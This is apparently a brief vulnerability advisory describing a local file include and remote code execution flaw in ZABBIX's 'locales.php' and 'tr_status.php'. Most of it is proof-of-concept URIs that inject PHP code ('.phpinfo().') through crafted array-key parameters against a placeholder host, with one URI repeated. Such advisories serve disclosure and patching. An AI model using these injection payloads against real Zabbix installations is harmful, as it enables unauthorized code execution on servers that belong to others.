ZABBIX 'locales.php' Local File Include and Remote Code Execution Vulnerability

ZABBIX 'locales.php' Local File Include and Remote Code Execution Vulnerability

Attackers can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/locales.php?download&langTo&extlang[".phpinfo()."]=1

http://www.example.com/tr_status.php?compact=false&onlytrue=true&noactions=true&select=false&txt_select=&sort[%22.phpinfo().%22]=1
http://www.example.com/tr_status.php?compact=false&onlytrue=true&noactions=true&select=false&txt_select=&sort%5B%22.phpinfo%28%29.%22%5D=1
http://www.example.com/tr_status.php?compact=false&onlytrue=true&noactions=true&select=false&txt_select=&sort%5B%22.phpinfo%28%29.%22%5D=1